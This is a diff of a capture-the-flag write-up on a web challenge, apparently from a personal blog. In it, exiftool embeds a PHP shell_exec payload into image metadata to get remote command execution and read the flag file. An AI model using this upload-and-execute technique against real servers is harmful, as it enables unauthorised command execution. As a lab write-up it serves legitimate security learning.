pikaroot/pikaroot.github.io/_posts/CodeCombat2023/2023-08-17-cloudstoragev2.md

 ![cloudstorage1](https://github.com/pikaroot/pikaroot.github.io/assets/107750005/dec3d978-14a7-4df9-bd5d-d215f88474d0)

-We concluded that this challenge website is vulnerable to PHP injection attacks.
-We can inject a PHP shellcode stating the location of the flag (given by the challenge) to execute remotely and retrieve information from the website.
+It is using PHP to execute an image file.
+So, we can inject a PHP shellcode stating the location of the flag (given by the challenge) to execute remotely and retrieve information from the website.

-Now, inject a super duper simple PHP shell execution payload into the `penguin.php` using `exiftool`.
+Inject a super duper simple PHP shell execution payload into the `penguin.php` using `exiftool`.

 ```
-┌──(kali㉿kali)-[~/finals/web/payloads]
-└─$ exiftool -DocumentName='<?php echo shell_exec("cat /home/flag.txt"); ?>' > penguin.php
+$ exiftool -DocumentName='<?php echo shell_exec("cat /home/flag.txt"); ?>' > penguin.php
     1 image files updated

 ┌──(kali㉿kali)-[~/finals/web/payloads]